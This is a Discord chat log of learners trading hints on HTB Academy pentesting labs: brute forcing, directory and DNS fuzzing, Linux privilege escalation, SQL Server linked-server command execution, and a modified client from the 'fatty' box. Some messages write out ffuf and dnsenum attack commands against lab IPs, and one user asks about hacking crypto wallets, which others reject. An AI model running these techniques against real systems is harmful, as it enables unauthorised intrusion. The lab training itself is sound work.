acoustic owl
zinc sentinel
#

Stay away if you want your sanity

#

Anyone feel free to dm me if you've solved the above šŸ™
Wasted 3days

pine dagger
zinc sentinel
wind rune
#

Can anyone help me with the Module: Login Brute Forcing; Section: Skills Assessment /Website (the first part of skills assessment)?

I keep getting hydra to return valid passwords to me for multiple different usernames and none of them work and open the website. I've used usernames "user", "admin", "b.gates".. My hydra commands always return passwords for these users but they do not work

pine dagger
muted fiber
# acoustic owl Sorry, I missed this message yesterday. You probably just added your PHP code. ...

No worries about the missed message, might be cause I use the reply function without pinging, since many people get annoyed for pings on discord and I don't want to bother anyone
Anyways it still will not work, the error message that spawns after I try to update the code is: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
Either my machine has a bug (which would be weird, but not impossible) or this is not the way you've completed the module sadglas

zinc sentinel
wind rune
pine dagger
#

There was an issue previously where the screenshots didn't quite line up, when debugging the restart-services.exe (note: not Restart-Oracle-Services.exe), and it confused a lot of people. But now its pretty straight forward to follow along.

acoustic owl
acoustic owl
rare topaz
#

i was correct.

acoustic owl
rare topaz
pine dagger
naive field
#

directories

#

i used the same wordlist they did in the section

#

šŸ¤·ā€ā™‚ļø :/

rare topaz
#

hold up

naive field
rare topaz
#

you're not meant to search recursively

#

you're meant to search for things like /blog, /something

not /blog/something, /blog/somethingelse

#

Searching recursively would be the 2nd line i mentioned

naive field
#

not under the blog dir

rare topaz
naive field
#

ohhh okay thanks

rare topaz
#

you can also choose to search recursively if you want, but honestly i use feroxbuster for directory fuzzing most of the time, ffuf i use more for misc usages like bruteforcing.

#

feroxbuster is very fast, though.

You wouldn't use it in actual pentest if the rules have a maximum request rate.

naive field
#

still nothing šŸ‘€

rare topaz
#

heh?

#

ss the output

naive field
#

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://178.62.68.209:30537/FUZZ

naive field
rare topaz
#

huh

#

worked for me on two different wordlists

rare topaz
#

can you try scrolling all the way up

#

to the instance where you used the command

rare topaz
#

oh

#

use -fs 986

#

it doesn't seem like your fuzzing isn't working

#

it's more like your terminal is messed up, probably cuz it's built into the web browser (ur on pwnbox)

#

so it bugs and continously spams ur terminal

naive field
naive field
#

thanks!

rare topaz
#

ur terminal is messed up so adding any form of outputting to a file/folder will let you see the actual results

#

-od creates a directory that stores matching entires

#

you can ctrl + c out of the command cuz there's only 2 noteworthy directories to find btw

vital adder
rare topaz
#

that or he's genuinely running it on a very small dimension

vital adder
# naive field

i'm guessing the error is from the copyright thing in the wordlist you can just follow the first or second section note with using the -ic tag to ignore that

vital adder
#

i think to make thing faster because the goal of this module is using the ffuf tool not waiting the like the Fing password attack module 🤣

rare topaz
vital adder
#

yea i miss read that my brain is 50% dead so it's autocomplete thing

rare topaz
#

is aight

sleek epoch
#

Hey guys is anyone having any good resource to learn IoT pentesting? I would appreciate the help Or any sorts of material shared or something

zinc marsh
zinc marsh
#
/* 123 */     String methodName = (new Object() {  }).getClass().getEnclosingMethod().getName();
/* 124 */     logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
/* 125 */     if (AccessCheck.checkAccess(methodName, this.user)) {
/* 126 */       return "Error: Method '" + methodName + "' is not allowed for this user account";
/*     */     }
/*     */     
/* 129 */     this.action = new ActionMessage(this.sessionID, "open");
/* 130 */     this.action.addArgument(foldername);
/* 131 */     this.action.addArgument(filename);
/* 132 */     sendAndRecv();
/* 133 */     String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar";
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
/*     */     if (this.response.hasError()) {
/* 136 */         return "Error: Your action caused an error on the application server!";
/*     */     }
/* 138 */       
/* 139 */     byte[] content = this.response.getContent();
/* 140 */     fos.write(content);
/*     */     fos.close();
/* 142 */     
/*     */     return "Successfully saved the file to " + desktopPath;
/*     */  }```
#

someone could help me with this?

#

it says I have an error in the line 134

#
fatty-client-new.jar.src\htb\fatty\client\methods\Invoker.java:134: error: cannot find symbol
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
              ^
  symbol:   class FileOutputStream
  location: class Invoker
fatty-client-new.jar.src\htb\fatty\client\methods\Invoker.java:134: error: cannot find symbol
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
                                         ^
  symbol:   class FileOutputStream
  location: class Invoker
2 errors```
red current
#

I'm having an issue getting the instructions from the Python Library Hijacking section in Linux Privilege Escalation to work. I've tried changing the payload to 777 using chmod and adjusting the file paths in my script to launch the attack. Nothing seems to be working. Does anyone have any hints or tips for this section?

#

The error I keep getting is that I don't have permission to use the payload even though it's my payload and I have full permissions over it.

fiery berry
red current
#

Yes, I'm not understanding this one at all. I really appreciate it!

dull vortex
vagrant gust
#

Can anyone just give me the initial foothold for the password attack medium lab

#

I cba trying for hours and hours to get in

gaunt monolith
vagrant gust
#

Like 2+hours

#

Then my box expired

#

I'm pissed icl

gaunt monolith
vagrant gust
#

Yeah

#

I used the password list

#

That came up empty

#

Then mutated

#

Mutated took too long

gaunt monolith
#

Let me check

#

You will got it with mutated password list

#

Take a little minute

vagrant gust
vagrant gust
#

Also am I correct in using ftp as ssh and ftp use them details

gaunt monolith
#

After get credentials Enumerate about services sharing file learning in module ..

#

I afraid to spoiler challenges Im not good to give hints

#

🄲

vagrant gust
dull vortex
#

I am working on the last portion of the Attacking Common Services Hard Lab. I am logged into the DB as the F****** user, and I am able to impersonate the J**** user. It does not show the user to have sysadmin privileges which I don't think is an issue, but I am struggling to execute commands on the linked server now and I am not sure what is wrong with my syntax.

dusty crag
#

Hello good day everyone

dusty crag
#

I want to learn cryptography wallet crashing and hacking,how to go about it ?

dull vortex
# dull vortex

Did I miss something, or am I not supposed to be able to execute commands with xp_commandshell?

dusty crag
#

Why is someone not replying to me

#

Who should I DM?

analog dock
dull vortex
dusty crag
analog dock
dusty crag
analog dock
rare topaz
#

#modules is only for HTB Academy's supported modules

dusty crag
rare topaz
#

@dusty crag i also suggest you verify in #welcome if you havn't already.

analog dock
rare topaz
rare topaz
analog dock
#

Basically asking us how to steal someone’s wallet

dusty crag
dull vortex
analog dock
dusty crag
analog dock
rare topaz
#

Well i'll let mods handle

urban sage
dusty crag
zinc marsh
rare topaz
#

If you're genuinely trying to figure out how to hack people's crypto wallets then ur in the wrong place

autumn pilot
#

Plus the description of the server

rare topaz
zinc marsh
dull vortex
rare topaz
#

I think there actually are jobs for people to pentest the security of crypto related stuff.

But if bro rlly wants that $$$ then he's in the wrong hood.

#

😭

analog dock
zinc marsh
gaunt monolith
zinc marsh
#

google still god tier lol

rare topaz
compact patrolBOT
rare topaz
#

Unless you have prior experience in a tech field

zinc marsh
#

then they start building the bases

#
/* 123 */     String methodName = (new Object() {  }).getClass().getEnclosingMethod().getName();
/* 124 */     logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
/* 125 */     if (AccessCheck.checkAccess(methodName, this.user)) {
/* 126 */       return "Error: Method '" + methodName + "' is not allowed for this user account";
/*     */     }
/*     */     
/* 129 */     this.action = new ActionMessage(this.sessionID, "open");
/* 130 */     this.action.addArgument(foldername);
/* 131 */     this.action.addArgument(filename);
/* 132 */     sendAndRecv();
/* 133 */     String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar";
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
/*     */     if (this.response.hasError()) {
/* 136 */         return "Error: Your action caused an error on the application server!";
/*     */     }
/* 138 */       
/* 139 */     byte[] content = this.response.getContent();
/* 140 */     fos.write(content);
/*     */     fos.close();
/* 142 */     
/*     */     return "Successfully saved the file to " + desktopPath;
/*     */  }```
#
fatty-client-new.jar.src\htb\fatty\client\methods\Invoker.java:134: error: cannot find symbol
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
              ^
  symbol:   class FileOutputStream
  location: class Invoker
fatty-client-new.jar.src\htb\fatty\client\methods\Invoker.java:134: error: cannot find symbol
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
                                         ^
  symbol:   class FileOutputStream
  location: class Invoker
2 errors```
livid zephyr
#

stupid question, but does parrot OS already has a internet browser installed?. I was trying the "live engagement" exercise from the shells & payloads, but can't find a browser to use inside the parrot/pwnd machine.

acoustic owl
livid zephyr
#

oh.. ok thank you.

brazen canopy
#

Hey Guys
I stuck in dns footprinting
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
I tryed
dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
nslookup 10.129.75.61
for sub in $(cat /usr/share/SecLists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt);do dig $sub.inlanefreight.htb @10.129.75.61 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done

dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt dev.inlanefreight.htb

dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/fierce-hostlist.txt inlanefreight.htb dev.inlanefreight.htb
dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt dev.inlanefreight.htb

for sub in $(cat /opt/useful/SecLists/Discovery/DNS/fierce-hostlist.txt);do dig $sub.inlanefreight.htb @10.129.75.61 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done

no luck
Someone have any hint?

red current
acoustic owl
red current
#

I'm in the Sudo section in Linux Privilege Escalation. I've tried all of the examples shown and nothing I've tried seem to work with getting the flag. The box shows that it should be vulnerable to the Sudo Policy Bypass exploit, but when I try it to get the flag I get a permission denied error. Does anyone have any hints or clues on this one?

red current
#

Yeah, I see that I have (ALL, !root) /bin/ncdu but I don't see any examples here in this section for exploiting that particular credential.

acoustic owl
red current
acoustic owl
red current
kind fern
#

In "Kerberoasting - from Linux" when I add -request while using GetUserSPNs.py, in the output it's print [-] invalid principal syntax, so how to get the hashes?

fiery berry
kind fern
fiery berry
#

can you paste the command here in spoiler tags?

kind fern
fiery berry
kind fern
red current
red current
#

I'm currently in the Polkit section in Linux Privilege Escalation and the pwnkit tool they want you to use isn't working. I'm getting an error of cannot create pwnkit/gconv-modules: Directory nonexistent. Has anyone come across this before in this section?

zinc marsh
#

Any wordlist someone could recommend to fuzz .git?

acoustic owl
red current
#

Okay, I ran gcc to compile it this way instead $ gcc cve-2021-4034-poc.c -o abc and when I run ./abc I get the same error.

red current
acoustic owl
#

Maybe restart the target

red current
severe moss
#

Im stuck at enumerating Users in "attacking Gitlab" - what userlist should i use for it? I found like 10 Users, but none of them works for the task.... :/

--update: it was case sensitive, and i didnt tryed every version i got :))) --

proud pine
#

Ah, I think you probably did what I did the first time. DM me.

gusty zinc
#
 Keep in mind the key WordPress directories discussed in the WordPress Structure section. Manually enumerate the target for any directories whose contents can be listed. Browse these directories and locate a flag with the file name flag.txt and submit its contents as the answer.

Hacking wordpress

Ive found an open directory, have searched for hours. Not finding much. What am I missing here.

autumn pilot
#

what if there is another directory

#

it could be related to a plugin

gusty zinc
#

For the Hacking Wordpress module - Login section : does anyone know the relevancy for the enumerating "all methods" question? What is the purpose of this?

bright geode
#

Hello, i need help please. I can`t enter to HTB because it doesnt work in my country. I had never entered the web.

#

I cant get the support page either

#

Someone can help me?

acoustic owl
bright geode
#

Maybe an email?

acoustic owl
fossil crescent
#

With a significant amount of help from wolfiej, I completed the Adv SQLi module. I managed to (with a lot of struggle) get to the SA on my own, but once I got to the SA... ran into one hurdle after another. Leading up to the SA, best advice I can give is to carefully re-re-re-read the given module section, fully digesting everything, and then you'll (likely) realize that it's really not anywhere near as hard as you initially thought... (at least, that was my take). For the SA, remember that sometimes different tools have different results... and with that, if anyone needs a nudge on any part of the Advanced SQL Injections module, feel free to DM me.

bright geode
acoustic owl
bright geode
acoustic owl
acoustic owl
bright geode
grim kiln
#

I got the flag from the Skills Assessment of SQLmap essentials but it doesnt work

#

restarted machine and thet was enough, a Y changed to a 7 in the flag šŸ™‚

strange shuttle
#

I'm pretty new in HackTheBox platform and haven't found solution why I can't get SSH connection to spawned IP address from Kali Virtual machine even I have initiated openvpn which I got from HackTheBox. It asks "Are you sure you want to continue connecting...." where I anwer "yes" but after that it just says permission denied (puplickey, password). What I do wrong

severe moss
#

at least that works for me on normal htb šŸ™‚

vagrant gust
#

is there any way of accessing a database in mysql whilst getting a access denied message

#

this is from the medium lab in password attacks

fathom pendant
#

Is it prompting you for a password when you ssh to the box?

fathom pendant
vagrant gust
#

u mind giving me a nudge @fathom pendant

#

im on the medium lab

#

ive got into ||mysql but when i try to get into the creds database it says access is denied for jason||

fathom pendant
#

Follow the trail. Maybe you can find a different user

vagrant gust
#

i have a feeling its in the ||creds database|| but i dont have access to that

#

is it in that one or the other one

fathom pendant
#

Then look for something you do have access to

#

ĀÆ_(惄)_/ĀÆ

vagrant gust
static roost
#

I feel like something is broken in Logrotate for Linux Privilege escalation. I'm reasonably certain I'm performing the exploit correctly.

#

Not catching a shell

fathom pendant
gusty zinc
#
hacking wordpress
Skills Assessment 
Submit the contents of the flag file in the directory with directory listing enabled.

I have craweled the directories of three plugins, and I cant seem to find the flag. Can anyone give me a santity check ?

vagrant gust
strange shuttle
#

Inside pwnbox I was able to get password query but inside VM Kali Linux it just did not work :/

red current
#

Wondering if anyone can assist with this issue. I'm in the assessment for Linux Priv Escalation and on the 4th question. I have found the username and password for the tomcat admin account on the box. However, I can't seem to find a way to use them to get the flag. Anyone here able to assist with this?

acoustic owl
red current
torpid zinc
#

hey everyone, i was doing the pivotting module and i was wondering the following: Lets say that you want to rdp to a host 2 hosts away. You have access to the two machines but not to the third one. Is it possible to make a tunnel from the third back to your attaking machine?

proud pine
gusty zinc
#
hacking wordpress
skills assessment

find the only non-admin user

I've found the users first name by browsing the webpage. Cant find the last name.
/wp-json/wp/v2/users doesnt appear to work. I cant find the user on the main page. Is there some other enumeration type from the module I should be doing to find this?

gusty zinc
#

thank you kindly

rustic sage
#

Yo plBunny, how hard was CBBH after taking CPTS (comparison)?

#

do they play into each other?

acoustic owl
#

I did CBBH first.
Both exams are different.
While CBBH is about Bug Bounty Hunting, CPTS is a Network Pentest

gusty zinc
#

I'm not trying to give htb ideas on how to take more of my money - but if they made a small practice exam environment for ... i dunno 10 bucks a month ... for practice for CBBH or CPTS exams - id buy it

acoustic owl
#

They do not compare properly with each other

rustic sage
#

they give you two exam attempts

#

thats more than enough

acoustic owl
gusty zinc
#

yeah ive done a good amount of the prolabs

thorn urchin
#

at least as far as their marketing is

gusty zinc
#

zephry ive done and completed, id say its probably closer to cpts

#

not cbbh

rustic sage
#

the guide itself says zephyr and dante are prereqs for CPTS

#

recommended*

#

wait

#

its offshore and dante

#

šŸ¤·šŸæā€ā™‚ļø

gusty zinc
#

interesting, those labs are huge

#

no way the exam is that big

rustic sage
#

yeah im only 7 flags into offshore

#

its hard

acoustic owl
rustic sage
#

Oh thats good to know

#

i like your spoon rating

#

perhaps i will finish offshore before my attempt

gusty zinc
#

Maybe they will make a lab focused on web app/bug bounty for cbbh

rustic sage
#

fortresses

#

thats kinda what they are

gusty zinc
#

oh is that right, didnt know

thorn urchin
#

feels like theyre phasing out dante as the go to recommendation and replacing it with zephyr

rustic sage
#

well HTB does not like egotistical, so that wouldnt surprise me

balmy saffron
#

Hello,
In Socks over RDP, when I use mstsc.exe (as administrator) with IP 172.16.6.155 and user jason, I do not even reach the password box. It says the remote computer is turned off or remote access is turned off or it is not available on the network.
I already respinned the target.

west night
acoustic owl
rustic sage
#

sometimes common ports get doubled ie 2222 for ssh and 8080 for http. its just a way of having the same service twice. 8080 is often used for dev

in your case 2222 is likely to help with learning pivoting

thorn urchin
#

yup it's complete arbitrary

#

human monkey brain just likes symmetry

#

the only real rules are 1. cant use a port already in use if youre binding a new service and 2. low ports tend to require more permissions wheras higher ports are free real estate.

oak kindle
#

Guys can any one help me with this "For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. "

fathom pendant
#

What is your actual question

#

That's just the module question

#

What module are you doing?

thorn urchin
fathom pendant
#

That looks like windows command line one

#

And iirc the powershell module that will give the flag is clearly labeled

oak kindle
#

YES ITS window command Line: I am able to do all the authentication> but i am not able to see the flag in the modules. I've treid several methods but it didn't work. can you suggest me which powershell command or filter should i use?

thorn urchin
#

now thats a real question

oak kindle
fathom pendant
rustic sage
#

have you considered consulting chatgpt?

fathom pendant
#

Look through your notes because that command is in there

oak kindle
# thorn urchin now thats a real question

For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. this is it, and i am supposed to find the user's flag

thorn urchin
#

a lot of people use chatgpt wrong, but this is actually a question that could be used for chatgpt.

that said its academy. 95% of the time its directly in the section info.

fathom pendant
rustic sage
#

yeah this struck me as a chatgpt help me along question

thorn urchin
oak kindle
thorn urchin
#

I was encouraging you for asking the real question better

fathom pendant
#

You're not extracting any file

rustic sage
fathom pendant
#

Just run the command to see which powershell modules are installed

oak kindle
fathom pendant
#

It will hit you like a brick

oak kindle
rustic sage
#

Alrighty

oak kindle
thorn urchin
autumn pilot
#

Usually, modules can include different commands in themselves

fathom pendant
#

Yes but iirc the command that shows modules also shows some of the internal commands of modules

#

I could be wrong tho

#

It's been a minute

thorn urchin
#

if nothing else it tells you what modules you should even be looking for

rustic sage
#

I dont believe this guy is leveraging a chat bot

#

my guy, please get into the habit

fathom pendant
#

Even then googling "how do I find commands of a powershell module" can help

rustic sage
fathom pendant
thorn urchin
#

lol

fathom pendant
#

Check your notes for the command

rustic sage
thorn urchin
#

Im gunna give benefit of the doubt and say that language barrier is screwing this person over hard

fathom pendant
autumn pilot
#

An example, if you load PowerView you will be presented will many different commands for that powershell module

rustic sage
#

^

thorn urchin
#

I think everybody does iirc

fathom pendant
#

Based payloadbunny

west night
fathom pendant
#

And yes there is a Linux target and a windows target

west night
#

Hi @fathom pendant. I checked out your hint about RDPing into the target but the port is closed.ssh was successful. I tried using nessuscli to find the scans but nessuscli was not installed on the jump host. Is there a concept that I am not understanding pertaining to jump host? thanks for your assistance.

fathom pendant
#

I might be misremembering that module then

west night
#

@fathom pendant I will try to use nessus on the jump host and then scan the ip address 172.16.16.100. I will let you know how it goes.